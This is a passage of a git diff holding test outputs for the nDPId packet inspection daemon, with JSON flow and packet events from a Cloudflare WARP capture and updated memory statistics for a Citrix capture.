00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-payload-len":5490,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1605} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872343 bytes -~~ total memory freed........: 5872343 bytes -~~ total allocations/frees...: 118214/118214 +~~ total memory allocated....: 6005977 bytes +~~ total memory freed........: 6005977 bytes +~~ total allocations/frees...: 120976/120976 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 444 chars ~~ json string max len.......: 651 chars diff --git a/test/results/cloudflare-warp.pcap.out b/test/results/cloudflare-warp.pcap.out new file mode 100644 index 000000000..f726e1d57 --- /dev/null +++ b/test/results/cloudflare-warp.pcap.out 
@@ -0,0 +1,67 @@ +00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"cloudflare-warp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"cloudflare-warp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1656230932729} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230932729,"flow_last_seen":1656230932729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1656230932729,"l3_proto":"ip4","src_ip":"10.158.134.93","dst_ip":"142.251.42.106","src_port":55512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1656230932729,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1656230932729,"pkt":"ABoRAAACABoRAAABCABFAAA0l3RAAEAGWO8KnoZdjvsqatjYAbtyVk7QfkNIjoAUAYa94wAAAQEICgCjbMKzFenn"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230932996,"flow_last_seen":1656230932996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230932996,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"159.138.85.48","src_port":42344,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1656230932996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1656230932996,"pkt":"ABoRAAACABoRAAABCABFAAA8oR5AAEAGmtoKCAABn4pVMKVoFGctlswbAAAAAKAC\/\/8oEgAAAgQFtAQCCAoAo20FAAAAAAEDAwg="} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1656230932998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230932998,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAGbAufilUwCggAARRnpWjSaTPkLZbMHFAS\/\/\/3PgAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1656230932998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230932998,"pkt":"ABoRAAACABoRAAABCABFAAAooR9AAEAGmu0KCAABn4pVMKVoFGctlswc0mkz5VAQ\/\/\/3PwAA"} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1656230932996,"flow_last_seen":1656230933316,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1656230933316,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"159.138.85.48","src_port":42344,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230934073,"flow_last_seen":1656230934073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230934073,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.16.32","src_port":40214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1656230934073,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1656230934073,"pkt":"ABoRAAACABoRAAABCABFAAA8zCNAAEAGtn8KCAABnfAQIJ0WAbspbaIxAAAAAKAC\/\/+2wAAAAgQFtAQCCAoAo24SAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1656230934076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230934076,"pkt":"ABoRAAACABoRAAABCABFAAAoAAdAABAGsrCd8BAgCggAAQG7nRbWkl3OKW2iMlAS\/\/9Y5wAA"} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1656230934076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230934076,"pkt":"ABoRAAACABoRAAABCABFAAAozCRAAEAGtpIKCAABnfAQIJ0WAbspbaIy1pJdz1AQ\/\/9Y6AAA"} +01026{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656230934073,"flow_last_seen":1656230934082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":406,"flow_tot_l4_payload_len":406,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1656230934082,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.16.32","src_port":40214,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mqtt-mini.facebook.com","ja3":"159db30fc8fac7fb58bcaeee8785a687","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+01065{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1656230934073,"flow_last_seen":1656230934194,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":406,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1656230934194,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.16.32","src_port":40214,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mqtt-mini.facebook.com","ja3":"159db30fc8fac7fb58bcaeee8785a687","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230934714,"flow_last_seen":1656230934714,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1656230934714,"l3_proto":"ip4","src_ip":"10.158.134.93","dst_ip":"216.58.196.68","src_port":40454,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1656230934714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1656230934714,"pkt":"ABoRAAACABoRAAABCABFAAA0ZaRAAEAGp6UKnoZd2DrERJ4GAbvZsETuj7TO0IARAXlU+gAAAQEICgCjbrOWos\/v"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1656230934714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230934714,"pkt":"ABoRAAACABoRAAABCABFAAAoAA1AABAGPUnYOsRECp6GXQG7ngaPtM7Q2bBE71AQ\/\/9lcwAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1656230934714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230934714,"pkt":"ABoRAAACABoRAAABCABFAAAoAA5AABAGPUjYOsRECp6GXQG7ngaPtM7Q2bBE71AR\/\/9lcgAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230939663,"flow_last_seen":1656230939663,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230939663,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1656230939663,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1656230939663,"pkt":"ABoRAAACABoRAAABCABFAAA8PDFAAEAGXIYKCAABaBIv6rImAbu8t0+5AAAAAKAC\/\/9xfAAAAgQFtAQCCAoAo3OIAAAAAAEDAwg="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1656230939665,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939665,"pkt":"ABoRAAACABoRAAABCABFAAAoABFAABAGyLpoEi\/qCggAAQG7siZDSLBGvLdPulAS\/\/9Z6wAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1656230939665,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939665,"pkt":"ABoRAAACABoRAAABCABFAAAoPDJAAEAGXJkKCAABaBIv6rImAbu8t0+6Q0iwR1AQ\/\/9Z7AAA"} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656230939663,"flow_last_seen":1656230939667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1656230939667,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45606,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.CloudflareWarp","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.cloudflareclient.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230939671,"flow_last_seen":1656230939671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230939671,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45610,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1656230939671,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1656230939671,"pkt":"ABoRAAACABoRAAABCABFAAA83IJAAEAGvDQKCAABaBIv6rIqAbsuP68IAAAAAKAC\/\/+gnwAAAgQFtAQCCAoAo3OKAAAAAAEDAwg="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1656230939672,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939672,"pkt":"ABoRAAACABoRAAABCABFAAAoABNAABAGyLhoEi\/qCggAAQG7sirRwFD3Lj+vCVAS\/\/9Z5wAA"} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1656230939672,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939672,"pkt":"ABoRAAACABoRAAABCABFAAAo3INAAEAGvEcKCAABaBIv6rIqAbsuP68J0cBQ+FAQ\/\/9Z6AAA"} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656230939671,"flow_last_seen":1656230939673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1656230939673,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45610,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CloudflareWarp","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.cloudflareclient.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01222{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1656230939663,"flow_last_seen":1656230939742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2837,"flow_tot_l4_payload_len":3023,"flow_avg_l4_payload_len":503,"midstream":0,"thread_ts_msec":1656230939742,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.CloudflareWarp","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.cloudflareclient.com","server_names":"cloudflareclient.com,*.cloudflareclient.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=cloudflareclient.com","alpn":"http\/1.1","fingerprint":"E6:54:3B:82:07:1E:29:C4:57:8C:B4:9E:64:38:11:38:9B:FC:66:98"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230939763,"flow_last_seen":1656230939763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230939763,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"142.250.183.163","src_port":51296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1656230939763,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1656230939763,"pkt":"ABoRAAACABoRAAABCABFAAA8inNAAEAGX6IKCAABjvq3o8hgAbvanPnSAAAAAKAC\/\/\/kiAAAAgQFtAQCCAoAo3OhAAAAAAEDAwg="} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1656230939765,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939765,"pkt":"ABoRAAACABoRAAABCABFAAAoABZAABAGGhSO+rejCggAAQG7yGAlYwYt2pz501AS\/\/+VDwAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1656230939765,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939765,"pkt":"ABoRAAACABoRAAABCABFAAAoinRAAEAGX7UKCAABjvq3o8hgAbvanPnTJWMGLlAQ\/\/+VEAAA"} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656230939763,"flow_last_seen":1656230939766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1656230939766,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"142.250.183.163","src_port":51296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"crashlyticsreports-pa.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
+01222{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1656230939671,"flow_last_seen":1656230939767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2800,"flow_tot_l4_payload_len":2986,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":1656230939767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45610,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CloudflareWarp","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.cloudflareclient.com","server_names":"cloudflareclient.com,*.cloudflareclient.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=cloudflareclient.com","alpn":"http\/1.1","fingerprint":"E6:54:3B:82:07:1E:29:C4:57:8C:B4:9E:64:38:11:38:9B:FC:66:98"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230939817,"flow_last_seen":1656230939817,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230939817,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.217.194.188","src_port":43600,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1656230939817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1656230939817,"pkt":"ABoRAAACABoRAAABCABFAAA816BAAEAG6XwKCAABrNnCvKpQFGzl+aQLAAAAAKAC\/\/8RUAAAAgQFtAQCCAoAo3OrAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1656230939818,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939818,"pkt":"ABoRAAACABoRAAABCABFAAAoABtAABAG8Ras2cK8CggAARRsqlAaBlv05fmkDFAS\/\/93dgAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1656230939818,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1656230939818,"pkt":"ABoRAAACABoRAAABCABFAAAo16FAAEAG6Y8KCAABrNnCvKpQFGzl+aQMGgZb9VAQ\/\/93dwAA"} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1656230939817,"flow_last_seen":1656230939818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.217.194.188","src_port":43600,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": 
